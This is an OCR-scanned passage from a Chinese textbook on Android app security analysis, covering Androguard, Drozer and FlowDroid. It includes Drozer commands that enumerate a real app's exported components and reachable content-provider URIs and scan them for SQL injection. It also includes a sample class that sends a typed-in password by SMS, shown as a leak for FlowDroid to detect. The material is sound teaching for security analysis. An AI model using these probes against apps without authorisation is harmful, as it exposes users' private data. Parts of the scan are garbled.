限 问 题 ,Androguard 也 提供 了 相应 的 函数 来 获取 Android 应 用 中 权限 的 使 用 点 。 

Androguard 统计 了 所 有 需要 使 用 权限 的 方法 和 字段 ,以 及 它们 与 具体 权限 之 间 的 对 
应 关系 。 在 分 析 具 体 App 的 权限 使 用 点 时 ,Androguard 遍历 APK 中 所 有 的 方法 和 变 
量 , 寻 找 与 权限 相对 应 的 方法 和 字段 的 使 用 ,并 保存 其 调用 路 径 。 

使 用 Androguard 进行 分 析 的 直观 操作 方式 是 使 用 其 提供 的 交互 分 析 工 具 
androlyze. py, 通 过 . /androlyze. py-s 可 以 进入 交互 分 析 界 面 。 输 入 图 11-9 中 的 命令 , 则 
可 得 到 当前 应 用 使 用 的 权限 信息 及 其 使 用 点 ,如 图 11-10 所 示 o 
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In [5]: apk,d,dx = AnalyzeAPK("/home/lulu/fruitninja.apk") 





In [5]: show Permissions(dx) 


图 11-9 获取 权限 使 用 点 的 命令 


In [5]: show Permissions(dx) 

|ACCESS NETWORK STATE : 

1 Lcom/openfeint/internal/OpenFeintInternal;-»isFeintServerReachable()Z (0x18) - 
--» Landroid/net/ConnectivityManager; -»getActiveNetworkInfo()Landroid/net/Networ 
kInfo; 

READ LOGS : 

1 Lcom/openfeint/internal/Util;-»run(Ljava/lang/String;)V (0xc) ---» Ljava/lang/ 

Runtime; -»exec(Ljava/lang/String; )Ljava/lang/Process 

WAKE LOCK : 

1 Lcom/halfbrick/fruitninja/SoundManager$AudioLoaderThread$MusicCompleteListener 
i-»0nCompletion(Landroid/media/MediaPlayer;)V (0x74) ---» Landroid/media/MediaPl 

ayer;-»start()V 

1 Lcom/halfbrick/fruitninja/SoundManager$AudioLoaderThread; -»AutoPause()V (0x20) 
---» Landroid/media/MediaPlayer;-»stop()V 

1 Lcom/halfbrick/fruitninja/SoundManager$AudioLoaderThread; --AutoResume()V (0x28 
) ---» Landroid/media/MediaPlayer;-»start()V 

1 Lcom/halfbrick/fruitninja/SoundManager$AudioLoaderThread; -»PlaySong(Ljava/lang 

/String;)V (0x148) ---» Landroid/media/MediaPlayer;-»start()V 

IGET ACCOUNTS : 

1 Lcom/openfeint/internal/Util5; -»getAccountNameEclair(Landroid/content/Context ; 
)Ljava/lang/String; (0xc) ---» Landroid/accounts/AccountManager; -»getAccountsByT 

ype(Ljava/lang/String;) [Landroid/accounts/Account ; 


图 11-10 权限 使 用 点 信息 





除了 使 用 androlyze. py 交互 环境 ,还 可 以 在 代码 中 直接 调用 相关 的 函数 来 检测 某 个 
具体 权限 的 使 用 点 ,如 图 11-11 所 示 。 





def display PERMISSION(apk) : 
# Show methods used by permission 
vm - dvm.DalvikVMFormat( apk.get dex() ) 
vmx = analysis.uVMAnalysis( vm ) 
perms access - vmx.get permissions( "WAKE LOCK" ) 
for perm in perms access : 
print "PERM : ", perm 
analysis.show Paths( vm, perms access[ perm ] ) 





图 11-11 编程 获取 权限 使 用 点 信息 


此 外 , 通过 对 比 show _ Permissions (dx) 命令 给 出 的 结果 与 被 测 应 用 


AndroidManifest. xml 文件 中 给 出 的 权限 列表 ,可 以 发 现 应 用 申请 了 但 并 未 实际 使 用 的 
权限 ,检测 过 权限 问题 。 


1132 组 件 分 析 


Android 应 用 组 件 中 存在 的 安全 问题 已 经 在 11.2. 2 节 中 进行 了 详细 的 介绍 。 针 对 
这 些 问题 ,研究 人 员 已 经 提出 了 多 个 检测 方案 和 工具 ,这 里 介绍 一 款 十 分 便利 的 工具 一 一 
Drozer!? , Drozer 原名 mercury, 是 一 款 Android 应 用 安全 评估 工具 ,可 以 检测 多 种 安全 
漏洞 ,其 中 提供 了 针对 组 件 安全 的 分 析 检 测 功 能 。 

Drozer 提供 的 是 交互 式 的 分 析 环 境 ,需要 在 目标 应 用 安装 的 设备 上 安装 agent. apk 
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作为 接收 命令 并 执行 具体 操作 的 客户 端 , 分 析 人 员 可 以 在 远 端 控制 台 输 入 命令 并 查看 
Drozer 执行 的 结果 。Drozer 不 仅 可 以 获取 目标 应 用 申请 的 权限 .暴露 的 组 件 等 一 些 静态 
信息 ,还 可 以 通过 发 送 相应 的 Intent 数据 与 目标 应 用 进行 动态 交互 。 

下 面 以 检测 手机 百度 应 用 软件 中 的 暴露 组 件 为 例 ,阐述 Drozer 工具 的 使 用 。 

1. 查找 完整 包 名 

Drozer 的 某 些 命令 只 能 输入 完整 的 包 名 才能 执行 ,因此 当 不 知道 测试 应 用 的 完整 包 
名 时 ,需要 使 用 app. package. list 命令 进行 查询 ,参数 为 包 名 中 应 含有 的 关键 字 。 针 对 百 
度 搜 索 应 用 的 查找 命令 及 其 执行 结果 如 图 11-12 所 示 。 


图 11-12 查找 完整 包 名 


当 该 命令 未 列 出 参数 时 ,返回 结果 为 当前 设备 上 所 有 已 安装 应 用 的 包 名 。 
2. 列 出 被 测 应 用 的 详细 信息 

输入 命令 为 

run app.package.info -a com.baidu.searchbox 

针对 手机 百度 应 用 软件 的 运行 结果 如 下 : 


Package: com.baidu.searchbox 
Application Label: Baidu 
Process Name: com.baidu.searchbox 
Version: 7.0 
Data Directory: /data/data/com.baidu.searchbox 
APK Path: /data/app/com.baidu.searchbox- l.apk 
UID: 10047 
GID: [1006, 3003, 1015, 1028] 
Shared Libraries: null 
Shared User ID: null 
Uses Permissions: 
— android.permission.CAMERA 
-com.baidu.searchbox.permission.APS INSTALL 


Defines Permissions: 
- com.baidu.permission.write bookmark 
— com.baidu.permission.performance.monitor 


-com.baidu.searchbox.permission.APS INSTALL 


这 里 列 出 了 从 AndroidManifest. xml 文件 中 可 以 获取 的 一 些 信息 ,如 应 用 程序 标签 、 
包 名 ,版 本 号 .申请 和 声明 的 权限 等 ,以 及 应 用 程序 使 用 的 数据 存储 路 径 .第 三 方 库 等 。 

3. 列 出 被 测 应 用 中 暴露 的 组 件 

输入 命令 为 
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run app.package.attacksurface com.baidu.searchbox 
运行 结果 如 下 : 
Attack Surface: 

39 activities exported 

18 broadcast receivers exported 


1 content providers exported 


5 services exported 


结果 说 明 手 机 百度 应 用 软件 中 共有 63 个 暴露 给 外 部 使 用 的 组 件 , 可 能 会 被 攻击 者 利 
用 造成 危害 。 这 里 以 其 中 暴露 的 ContentProvider 组 件 为 例 进 行 下 面 的 分 析 。 

4. 查看 暴露 的 Activity 组 件 信息 

输入 命令 为 

run app.activity.info -a com.baidu.searchbox 

运行 结果 如 下 : 


Package: com.baidu.searchbox 
com.baidu.searchbox.SplashActivity 
com.baidu.searchbox.MainActivity 
com.baidu.searchbox.widget.ClockWidgetConfigure 
com.baidu.searchbox.SearchActivity 


结果 中 列 出 了 暴露 的 Activity 组 件 的 类 名 ,可 用 于 从 百度 应 用 外 部 启动 相应 的 
Activity。 

5. 查看 暴露 的 BroadcastReceiver 组 件 信息 

输入 命令 为 

run app.broadcast.info -a com.baidu.searchbox 

运行 结果 如 下 : 


Package: com.baidu.searchbox 
Receiver: com.baidu.searchbox.LauncherSearchBoxReceiver 
Receiver: com.baidu.searchbox.widget.SearchWidgetProvider 
Receiver: com.baidu.searchbox.widget.TransSearchWidgetProvider 


Receiver: com.baidu.searchbox.widget.ClockWidgetProvider 


6. 查看 暴露 的 Service 组 件 信息 
输入 命令 为 


run app.service.info -a com.baidu.searchbox 


运行 结果 如 下 : 
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Package: com.baidu.searchbox 

com.baidu.android.pushservice.CommandService 
Permission: null 

com.baidu.searchbox.service.HandleSSOService 


Permission: null 


7. 查看 暴露 的 ContentProvider 组 件 信 息 
输入 命令 为 

run app.provider.info -a com.baidu.searchbox 
运行 结果 如 下 : 


Package: com.baidu.searchbox 
Authority: baidusearch bookmark 
Read Permission: null 
Write Permission: com.baidu.permission.write bookmark 
Content Provider: com.baidu.searchbox.bookmark.BookmarkProvider 
Multiprocess Allowed: False 


Grant Uri Permissions: False 


结果 给 出 了 当前 暴露 的 ContentProvider 组 件 为 com. baidu. searchbox. bookmark. 
BookmarkProvider, 该 组 件 有 写 权限 保护 ,但 是 没有 读 权限 的 保护 ,因此 可 能 被 攻击 者 利 
用 ,获取 通过 该 组 件 可 以 访问 的 应 用 数据 。 

8. 列 出 可 用 的 URI 

输入 命令 为 

run scanner.provider.finduris -a com.baidu.searchbox 

运行 结果 如 下 : 


Scanning com.baidu.searchbox... 
Unable to Query content://com.tencent .mm.sdk.plugin.provider/sharedpref/ 
Unable to Query content://mms- sms/conversations/ 
Able to Query content://baidusearch bookmark/bookmarksdir/ 
Accessible content URIs: 
content: //telephony/carriers/preferapn/ 
content://baidusearch bookmark/bookmarksdir 
content://baidusearch bookmark/bookmarksdir/ 
content://baidusearch bookmark/bookmarks 
content://baidusearch bookmark/bookmarks/ 
content: //telephony/carriers/preferapn 


Drozer 遍历 了 被 测 应 用 中 所 有 的 URI, 列 出 了 其 中 可 以 在 该 应 用 外 部 访问 的 URI, 
有 了 这 些 URI 就 可 以 尝试 进行 访问 了 ,例如 通过 run app. provider. query content:// 
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baidusearch_bookmark/bookmarks 获取 用 户 使 用 手机 百度 访问 的 网 页 信息 。 
9. 检查 可 以 实施 SQL 注入 攻击 的 URI 
输入 命令 为 
run scanner.provider.injection -a com.baidu.searchbox 
运行 结果 如 下 : 
Scanning com.baidu.searchbox... 
Not Vulnerable: 


content://baidusearch bookmark/ 


content: //mms- sms/conversations/ 


Injection in Projection: 
content: //telephony/carriers/preferapn/ 
content://baidusearch bookmark/bookmarksdir/ 
content://baidusearch bookmark/bookmarks 
content: //telephony/carriers/preferapn 
content://baidusearch bookmark/bookmarks/ 
content://baidusearch bookmark/bookmarksdir 

Injection in Selection: 
content: //telephony/carriers/preferapn/ 
content://baidusearch bookmark/bookmarksdir/ 
content://baidusearch bookmark/bookmarks 
content: //telephony/carriers/preferapn 
content://baidusearch bookmark/bookmarks/ 
content://baidusearch bookmark/bookmarksdir 


1133 代码 分 析 


代码 是 实现 应 用 功能 的 根本 ,所 以 分 析 Android 应 用 中 是 否 存在 安全 问题 ,最 重要 的 
还 是 要 分 析 具 体 代码 。 对 代码 进行 分 析 有 多 种 方面 ,例如 函数 调用 路 径 分 析 、 数 据 流 分 
析 、 控 制 流 分 析 等 ,根据 不 同 的 分 析 目 标 采 用 不 同 的 方法 。 这 里 介绍 几 种 典型 设计 方案 或 
者 工具 , 供 读 者 在 进行 具体 分 析 时 选用 。 

1. FlowDroid 

FlowDroid" 中 是 一 个 静态 污点 分 析 系 统 ,追踪 数据 从 数据 源 到 数据 流出 点 的 流动 ,用 
于 检测 Android 应 用 中 的 隐私 泄露 问题 。 数 据 源 是 应 用 程序 获取 隐私 数据 的 调用 函数 ， 
例如 TelephonyManager 的 getDeviceld 函数 ;数据 流出 点 是 将 隐私 数据 写 入 一 个 可 供 开 
发 者 访问 的 资源 的 函数 ,通常 写 入 socket 中 ,通过 网 络 将 隐私 数据 传送 出 去 。 

FlowDroid 的 整体 设计 思想 如 下 : 分 析 从 程序 入 口 点 到 隐私 数据 源 之 间 的 可 达 性 ， 
从 这 些 数据 源 出 发 ,追踪 隐私 数据 在 控制 流 图 中 的 传递 , 当 隐 私 数据 到 达 一 个 流出 点 时 ， 
即 可 判定 存在 隐私 泄露 。 
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D 控制 流 图 构建 

与 Java 程序 不 同 ,Android 应 用 并 没有 一 个 单一 的 main 函数 作为 整个 程序 运行 的 开 
始 ,而 是 拥有 很 多 人 口 点 ,这 些 人 口 点 可 能 是 暴露 的 组 件 , 也 可 能 是 Android framework 
可 以 隐 式 调用 的 函数 (如 组 件 的 生命 周期 转换 函数 )。Android 应 用 中 的 每 个 组 件 都 有 自 
己 完 整 的 生命 周期 ,可 以 依托 这 样 的 生命 周期 转换 流程 构建 控制 流 图 。FlowDroid 创建 
了 一 个 虚拟 main 函数 来 模拟 组 件 生命 周期 的 转换 ,同时 虚拟 main. 函数 中 还 需要 对 应 用 
中 注册 的 回调 函数 的 调用 进行 模拟 。FlowDroid 为 每 一 个 Android 应 用 生成 一 个 对 应 的 
虚拟 main 函数 ,在 main 函数 中 包含 当前 应 用 所 有 入 口 点 组 件 的 生命 周期 转换 函数 和 回 
调 函 数 调 用 ,之 后 构建 虚拟 main 函数 的 控制 流 图 ,并 基于 此 构建 整个 应 用 的 过 程 间 控制 
流 图 。 

例如 ,在 图 11-13 所 示 的 例子 中 , onRestart 是 Activity 的 生命 周期 相关 困 数 ， 
sendMessage 是 开发 者 在 布局 文件 中 注册 的 按钮 点 击 事件 的 回调 函数 (回调 函数 也 可 以 
通过 一 些 公开 的 系统 方法 来 注册 ,例如 setOnClickedListener, FlowDroid 也 可 以 处 理 这 
种 方式 的 回调 函数 )。FlowDroid 对 图 11-13 中 的 代码 生成 虚拟 main. 函数 后 构建 的 控制 
流 图 如 图 11-14 所 示 , 其 中 p 为 抽象 判断 语句 ,表示 在 不 同 条 件 下 会 执行 不 同 的 步骤 。 





public class LeakageApp extends Activity{ 
private User user - null; 
protected void onRestart (){ 

EditText usernameText - 

(EditText)findViewById(R.id.username); 

5| EditText passwordText - 
(EditText)findViewById(R.id.pudString); 
6| String uname = usernameText.toString(; 
7| String pwd = passwordText.toString(; 
8| if(!uname.isEmpty() && !pwd.isEmpty ()) 
9 this.user = new User(uname, pwd); 
10|} 
lll//Callback method in xml file 
I2|public void sendMessage(View view){ 
13 if(user == null) return; 
14| Password pwd = user.getpwd(; 
15| String pwdString = pwd.getPassword(); 
16 String obfPwd = ""; 
17 //must track primitives: 
18| for(char c : pwdString.toCharArray O) 


OD- 





19 obfPwd += c + "_"; //String concat. 

20 

21 String message = "User: " + 

22 user.getName() + " | Pwd: " + obfPud; 


23| SmsManager sms = SmsManager.getDefault(); 
24 sms.sendTextMessage("*44 020 7321 0905", 

25 null, message, null, null); 

26|} 














图 11-13 示例 代码 


在 FlowDroid 最 终 构建 的 过 程 间 控制 流 图 中 ,每 一 个 节点 对 应 一 条 程序 语句 ,代表 过 
程 间 调 用 的 有 两 类 节点 ,一 类 是 调用 节点 , 另 一 类 是 返回 节点 。 控 制 流 图 中 有 4 种 类 型 的 
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LeakageApp la = new LeakageApp(); 











m| la.onCreate(); 








la.onStart(); 


i 


r—* la.onResume(); | 


CM la.sendMessage(); 


la.onPause(); 


<> 


la.onStop(); 


















































la.onRestart(); 





la.onDestroy(); 











图 11-14 ”控制 流 图 


边 ,第 一 种 是 调用 边 ,连接 一 个 过 程 调用 的 调用 节点 与 被 调用 过 程 的 开始 节点 ;第 二 种 是 
返回 边 ,连接 一 个 方法 的 退出 节点 与 其 对 应 的 调用 语句 的 返回 节点 ;第 三 种 是 call-to- 
return 边 ,是 过 程 内 的 边 ,连接 调用 节点 和 返回 节点 ;第 四 种 是 普通 边 , 是 上 述 3 种 类 型 之 
外 的 所 有 的 边 。 

2) 污点 传播 分 析 

污点 传播 分 析 是 跟踪 隐私 数据 在 程序 中 如 何 使 用 的 最 佳 方法 ,将 隐私 数据 标记 为 污 
点 数据 ,在 其 传播 过 程 中 将 污点 标记 附 随 传播 ,最 后 通过 查看 污点 标记 出 现 的 地 方 就 可 以 
知晓 隐私 数据 的 流动 过 程 。 

FlowDroid 的 污点 传播 分 析 可 以 精确 到 字段 级 别 , 包 括 前 向 污点 分 析 和 后 向 别名 分 
析 两 部 分 。 例 如 ,在 图 11-15 所 示 的 例子 中 ,source() 为 隐私 数据 源 函 数 ,因此 w 为 污点 
源 。 污 点 传播 分 析 过 程 如 下 : Ow 作为 污点 源 ,向 前 传递 给 了 x. f; @ 继 续 向 前 追踪 x. f 
污点 标记 的 传递 ; @ 后 向 别名 分 析 发 现 x 和 z. g 是 引用 的 数据 堆 中 同一 位 置 ,因此 x 是 
z. g 的 别名 ; DK z. g. 标记 为 污点 数据 ; @z 是 foo 函数 的 参数 ,而 main 函数 在 传 参 时 
使 用 的 是 a, 因此 z 是 a 的 别名 ,a. g.f 被 标记 为 污点 数据 ; @ 继 续 后 向 分 析 , 发 现 b=a. g, 
即 b 是 a.g 的 别名 ,而 上 面 的 分 析 中 a. g.f 已 经 为 污点 数据 ,因此 将 b.f 标记 为 污点 数据 ; 
@ 此 时 后 向 分 析 已 无 须 再 进行 ,从 b 开始 做 前 向 分 析 , 发 现 数据 流出 函数 sink 的 参数 b. f 
已 被 标记 为 污点 源 数 据 ,因此 发 现 了 从 source 到 sink 的 隐私 数据 泄露 。 
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Æ 11-15 FlowDroid 污点 传播 示例 


基于 这 种 细 粒 度 的 传播 分 析 ,FlowDroid 可 以 提高 隐私 泄露 问题 的 检 出 率 。 

根据 过 程 间 控制 流 图 的 4 类 边 ,FlowDroid 设 定 了 4 条 前 向 污点 分 析 规 则 : 

CD 对 于 赋值 语句 来 说 , 右 值 为 污点 数据 时 , 左 值 也 将 被 标记 为 污点 数据 ;对 于 数组 
类 型 的 数据 ,一 个 元 素 为 污点 数据 时 ,整个 数组 都 被 标记 为 污点 数据 ;使 用 new 语句 为 变 
Hit x 赋值 时 ,x 之 前 拥有 的 污点 标记 即 被 擦 除 ;对 于 算数 操作 ,如 x=a 十 b, 当 右边 的 变量 
有 至 少 一 个 有 污点 标记 时 , 左 值 被 标记 为 污点 数据 。 

C2) 对 于 函数 调用 ,例如 c.m(ao ,al，… ,a,) ,调用 参数 ai 的 污点 标记 传人 被 调用 函数 
中 的 对 应 变量 ,c 的 污点 标记 传递 给 被 调用 函数 中 的 this 对 象 , 调 用 者 和 被 调用 者 共同 拥 
有 的 静态 变量 保持 原 有 的 污点 标记 。 

(3) 对 于 函数 返回 (包括 正常 返回 和 异常 返回 ) ,例如 b= 二 cm(ao «ai aD o Bk 
用 者 this 对 象 的 污点 标记 改变 将 反馈 给 c; 如 果 参 数 a 不 是 string/int 等 基本 类 型 , 则 这 
些 参数 在 被 调用 函数 运行 过 程 中 的 污点 标记 改变 将 返回 给 调用 者 ,被 调用 者 和 调用 者 
共有 的 静态 变量 的 污点 标记 改变 将 返回 给 调用 者 ,被 调用 者 返回 值 的 污点 标记 将 反馈 
给 b. 

(4) 对 于 call-to-return 的 情况 ,如 果 调 用 了 数据 源 函 数 (source 函数 ) , 则 添加 新 的 污 
点 标记 ;如 果 调 用 了 原生 函数 , 则 根据 调用 的 函数 具体 区 分 函数 返回 值 是 否 添加 污点 
标记 。 

对 于 后 向 别名 分 析 ,FlowDroid 同样 设置 了 4 类 规则 。 假 设 A 为 别名 信息 的 集合 , 初 
始 元 素 为 污点 数据 的 访问 路 径 , 如 a. g.f。 在 后 向 遍历 程序 语句 过 程 中 , 当 A 变 为 空 集 
时 ,后 向 别名 分 析 结 束 。 

CD 对 于 赋值 语句 ,例如 x. £— y. g, 如 果 x. fk EES A 中 , 则 将 x.f.k 从 集合 A 中 
除去 ,将 y. g.k 加 入 ;对 于 使 用 new 语句 的 赋值 语句 ,将 左 值 的 所 有 别名 信息 去 掉 , 例 如 
x. f. k=new MO , 则 将 x. f. k 从 集合 A 中 去 掉 。 

C2) 对 于 函数 调用 ,因为 别名 分 析 是 后 向 分 析 , 因 此 跟踪 函数 调用 的 返回 边 ,例如 
b=c. m(ao «ai «t ,a,) ,假设 方法 m 有 多 个 返回 点 ,返回 值 分 别 为 ,ro，…,r,。 如 果 c.f 
存在 于 调用 者 的 别名 集合 中 , 则 将 this.f 添 加 到 被 调用 者 的 别名 集合 中 ;如 果 调 用 者 和 被 
调用 者 共用 一 些 静 态 变 量 , 则 将 调用 者 别名 集合 中 这 些 静 态 变量 的 别名 信息 加 入 被 调用 
者 的 别名 集合 中 ;如 果 b. f 存在 于 调用 者 的 别名 集合 中 , 则 对 应 的 被 调用 者 的 返回 值 n. f 
也 加 入 被 调用 者 的 别名 集合 中 。 
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(3) 对 于 函数 返回 ,因为 别名 分 析 是 后 向 分 析 , 因 此 不 处 理 被 调用 函数 返回 值 对 原 调 
用 函数 的 别名 影响 。 

(4) 对 于 call-to-return 的 情况 ,将 返回 值 相关 的 别名 信息 都 删除 ,例如 b= nativecallO . 
则 将 b. f. b. k 等 别名 都 从 别名 集合 A 中 删除 。 

FlowDroid 每 找到 一 个 别名 被 标记 为 污点 数据 时 ,都 会 从 这 个 别名 变量 开始 开启 一 
个 前 向 污点 传播 分 析 。 但 是 别名 分 析 本 身 不 是 流 敏 感 的 。 例 如 ,在 图 11-16 所 示 的 例子 
中 ,通过 foo(a) 的 调用 ,a. g.f 被 标记 为 污点 数据 ,通过 后 向 别名 分 析 , 在 第 3 行 b.f 也 被 
标记 为 污点 数据 ,此 时 从 第 3 行 开始 前 向 污点 分 析 时 发 现 
第 4 行 出 现 污点 数据 进入 数据 流出 点 的 情况 ,但 是 实际 运 void madn2CO 


A a= new AQ; 





行 时 ,在 第 4 行 时 b.f 还 没有 变 成 污点 数据 。 为 了 解决 这 G b = a.g; 
类 问题 ,FlowDroid 引入 了 污点 激活 语句 的 概念 , 即 带 有 i. 
o00(a); 


污点 标记 的 数据 只 有 在 前 向 污点 分 析 过 程 中 遇 到 污点 激 } 
活 语句 时 才 真 正成 为 污点 数据 。 污 点 数据 是 在 foo 函数 
中 被 设置 的 ,因此 在 图 11-16 中 foo(Ca) 是 函数 main2 中 的 
污点 激活 语句 ,含有 污点 标记 的 b.f 在 经 过 第 5 行 foo(a) 
的 执行 之 后 才 真 正 变 为 污点 数据 ,因此 可 以 判断 在 第 4 行 的 数据 流出 点 处 并 没有 实际 发 
HE ESCAS DA E 。 
2. Androguard 
在 11.3.1 节 ,已 经 简单 提 到 使 用 Androguard 获取 权限 使 用 点 的 方法 ,获取 权限 使 
用 点 也 是 代码 分 析 方 法 的 一 个 具体 应 用 ,下 面 对 Androguard 中 的 其 他 工具 进行 介绍 。 
Androguard 在 其 源码 主 目录 下 提供 了 十 几 种 静态 分 析 工 具 供 分 析 人 员 直 接 使 用 ,其 
中 几 种 常用 工具 及 其 功能 如 表 11-2 所 示 。 
表 11-2 Androguard 中 的 常用 工具 
工具 名 称 功能 说 明 
androaxml 将 APK 文件 中 的 二 进 制 AndroidManifest. xml 文件 转换 成 标准 格式 xml 文件 
androapkinfo 输出 apk 文件 中 的 文件 列表 、 权 限 列表 、 组 件 ,方法 等 
androdiff 比较 两 个 apk 文件 的 差异 ,给 出 类 和 方法 中 不 同 的 部 分 ,包括 删除 的 和 新 增 的 内 容 
记录 两 个 apk 文件 的 相似 度 ,得 到 相似 的 方法 个 数 以 及 增加 、 删 除 的 方法 个 数 ,并 








图 11-16 示例 代码 


























ei 根据 这 些 数据 计算 两 个 apk 文件 的 整体 相似 度 
ee 评估 一 个 apk 文件 的 危险 级 别 ,根据 是 否 申请 了 敏感 权限 ,是 否 包含 动态 加 载 代 
码 Java 反射 等 因素 来 判断 
andiodd 为 apk 文件 中 每 个 类 的 方法 生成 执行 流程 图 ,可 选 odt 格式 或 png jpg 格式 
为 整个 apk 文件 生成 函数 调用 图 ,输出 gexf 格式 的 图 形 文件 ,需要 使 用 Gephi $ 
androgexf 
件 查看 
UE 为 apk 文件 中 的 每 个 类 生成 指令 级 别 的 调用 关系 图 ,同时 也 生成 一 个 汇总 的 调用 





关系 图 ,输出 为 graphml 格式 的 图 形 文件 ,也 可 以 使 用 Gephi 软件 打开 
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续 表 
工具 名 称 功能 说 明 
EE RN 分 析 输 入 的 apk/jar/class/dex 文件 ,生成 相应 的 控制 流程 及 调用 图 ,输出 xgmml 
格式 文件 ,可 用 Cytoscape 软件 打开 

将 apk 文件 的 签名 信息 添加 到 Androguard 提供 的 本 地 数据 库 中 ,便于 恶意 应 用 的 
androcsign 检索 
androsign 检索 当前 apk 文件 的 签名 是 否 存 在 于 Androguard 提供 的 本 地 数据 库 中 
androlyze 为 分 析 人 员 提 供 交互 式 分 析 环 境 








1) androdiff 和 androsim 

androdiff 和 androsim 给 出 两 个 apk 文件 在 代码 上 的 相似 度 和 不 同 之 处 ,在 检测 重 打 
包 应 用 时 有 一 定 的 帮助 作用 。 其 中 androsim 只 给 出 相似 部 分 所 占 的 百分比 ,androdiff 会 
给 出 具体 的 不 同 之 处 。 

(I) androsim 的 命令 格式 为 


androsim.py -i one.apk two.apk 


输出 结果 如 图 11-17 所 示 。 





Elements: 
IDENTICAL: 1 
SIMILAR: 2 
NEW: 3 
DELETED: 5 

0 


SKIPPED: 
==> methods: 44.333333% of similarities 





图 11-17 androsim 的 输出 结果 


(2) androdiff 的 命令 格式 为 
androdiff.py -i one.apk two.apk 


输出 结果 如 图 11-18 Bron o 

2) androdd ,androgexf,apkviewer 和 androxgmml 

这 几 个 工具 都 涉及 程序 的 执行 流程 或 调用 关系 ,只 是 级 别 不 同 。 
(1) androdd 生成 的 是 方法 内 部 的 执行 流程 图 ,命令 格式 为 


androdd.py - i test.apk -o outdir -d -fpng 


上 面 的 命令 指定 输出 格式 为 png, 其 生成 的 onCreate 方法 的 执行 流程 图 如 图 11-19 
所 示 。 
(2) androgexf 生成 的 是 整个 apk 文件 中 的 函数 的 调用 关系 图 ,命令 格式 为 


androgexf.py -i test.apk -o out.gexf 


生成 的 gexf 图 如 图 11-20 所 示 。 
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[ ('Landroid/example/MainActivity2;', 'onCreate', '(Landroid/os/Bundle;)V') ] <-> [ ( 
"Lcom/example/jex/permtest2/MainActivity;', 'onCreate', '(Landroid/os/Bundle;)V') ] 
onCreate-BBgexe onCreate-BBQexe 
Added Elements(8) 
exe 9 const/4 v2, 1 
6x8 2 const/4 v0, 9 
@xa 3 add-int/lit8 vð, ve, 1 
Oxe 4 invoke-virtual v3, v3, v6, Lcom/example/jex/permtest2/MainActivity; -»fucti( 
Landroid/content/Context; I)Landroid/content/SharedPreferences; 
0x14 5 invoke-virtual v3, v3, v2, Lcom/example/jex/permtest2/MainActivity; -»fuct2( 
Landroid/content/Context; I)Landroid/content/SharedPreferences; 
@xla 6 invoke-virtual v3, v3, v2, Lcom/example/jex/permtest2/MainActivity;-»fuct3( 
Landroid/content/Context; I)Landroid/content/SharedPreferences; 
9x26 7 const/4 v1, 9 
0x22 8 invoke-virtual v3, v3, vl, Lcom/example/jex/permtest2/MainActivity; -»fuct4( 
Landroid/content/Context; I)Landroid/content/SharedPreferences; 
Deleted Elements(1) 
0x6 1 const vð, 2130903041 # [1.741288877302336e438] 





Elements: 
IDENTICAL: 
SIMILAR: 
NEW: 
DELETED: 
SKIPPED: 


cocor 


NEW METHODS 
Lcom/example/jex/permtest2/MainActivity; fuct4 (Landroid/content/Context; I) 
Landroid/content/SharedPreferences; 10 
Lcom/example/jex/permtest2/MainActivity; fuct3 (Landroid/content/Context; I) 
Landroid/content/SharedPreferences; 8 
Lcom/example/jex/permtest2/MainActivity; fuct1 (Landroid/content/Context; I) 
Landroid/content/SharedPreferences; 7 

DELETED METHODS 
Landroid/example/MainActivity2; onCreateOptionsMenu (Landroid/view/Menu;)Z 12 
Landroid/example/MainActivity2; onOptionsItemSelected (Landroid/view/MenuItem;)Z 15 
Landroid/example/MainActivity; funct1 ()V 2 
Landroid/example/MainActivity; funct2 ()V 11 
Landroid/example/MainActivity; onCreateOptionsMenu (Landroid/view/Menu;)Z 11 











图 11-18  androdiff 的 输出 结果 





0 invoke-super v1, v2, Landroid/app/Activity:-»onCreate(Landroid/os/Bundle:) V 
6 const/high16 v0, 32515 st [1.7412886744782398e*38] 

a invoke-virtual v1, v0, Landroid/example/MainActi: 
10 invoke-virtual v1, Landroid/example/MainActi 
16 invoke-virtual v1, Landroid/example/MainActivit 
lc return-void 





»setContentView(DV 
funct10V 
»funct20V 


















图 11-19  onCreate 方法 执行 流程 图 


通过 图 11-20 可 知 ,MainActivity 中 的 onCreate 方法 调用 了 setContentView functl 
和 funct2 这 3 个 方法 ,而 funct2 方法 调用 了 startActivity 方法 。 图 11-20 中 每 个 节点 的 
详细 信息 如 图 11-21 所 示 。 

(3) apkviewer 为 apk 文件 中 每 一 个 类 生成 指令 级 的 调用 关系 图 ,命令 格式 为 


apkviewer.py -i test.apk -o outdir 
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Nodes (ld JLabet Jclass.name (method. name (descriptor. 
Landroid/example/MainActivity; funct2 (V o m! [Landroid/example/MainActivity, funct2 ov 
Landroid/exampLe/MainActivity, startActivity (Landroid 1 |Landreid/ |Landroid/example/MainActivity startActivity (Landroid/centent/Intent;) V 
Landroid/example/MainActivity, onCreate (Landroid/os 2. |Landrcid/dactivity |Lancroid/exampte/MainActivity, onCreate. ((Landroid/os/Bundle;]V 
Landroid/exampLe/MainActivity, setContentView (I)V |3 |Landrcid/ |Landroid/example/MainActiity|setContentView — |()V 
Landroid/example/MainActivity; functl V 4 |Landroian |Landroid/example/MainActivity; |runctl ov 
Landroid/example/MainActivity; onCreateOptionsMend5 |Landrcid/ |Landroid/example/MainActivity, onCreateOptionsMen (Landr oid/view/Menu:)Z 
Landroid/example/MainActivity; getMenulnflater 0Lanl6 |Landroid/ Landroid/example/ManActivity, getMenuInflater |0Landroid/view/MenuInfater; 
Landroid/example/MainActivity2; onCreate (Landroid/q7 |Landrcid/activity |Landroid/example/MainActivityaonCreate ((Landroid/os/Bundle) V 
Landroid/exampLe/MainActivity2; setContentView (I)V|8 |Landroid/ ILandroid/example/MainActiitydsetContentView — |()V 

 Landroidjexample/MsinActiviy2; onCreateOptionsMel9 |LandrodA —— e 
Landroid/example/MainActivity2; getMenulnflater OLa10 |Landroid/ |Landroid/example/MsinActivitydgetMenulnfiater — |ÜLandroid/view/Menulnflater; 
ACTIVITY 11 |Acrivim] |Landroid/example/MainActivity, onCreate. (Landroid/os/Bundie;] VACTIVIT| 
ACTIVITY 12|acrivim] |Landroid/exampte/MainActivitydonCreate (Landroid/os/Bundle; VACTIVIT| 























图 11-21 节点 详细 信息 


输出 格式 为 graphml 文件 ,apk 文件 中 的 每 个 类 都 对 应 一 个 graphml 文件 。apkviewer 
为 每 个 类 创建 一 个 文件 夹 ,在 其 中 存放 graphml 文件 ,同时 在 主 目录 下 生成 保存 方法 调用 关 
